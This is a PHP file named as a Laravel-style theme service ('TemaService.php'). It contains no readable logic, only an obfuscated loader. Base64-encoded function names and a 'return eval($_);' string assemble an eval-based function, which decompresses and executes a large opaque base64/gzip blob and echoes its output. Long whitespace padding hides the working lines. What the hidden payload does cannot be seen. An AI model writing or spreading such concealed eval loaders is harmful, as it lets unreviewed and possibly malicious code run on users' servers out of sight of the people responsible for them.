<?php 
        $__='printf';$_='Loading app/Services/TemaService.php';
        



















































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


















































































































































































































                                                                                                                                                                                                                     $________;
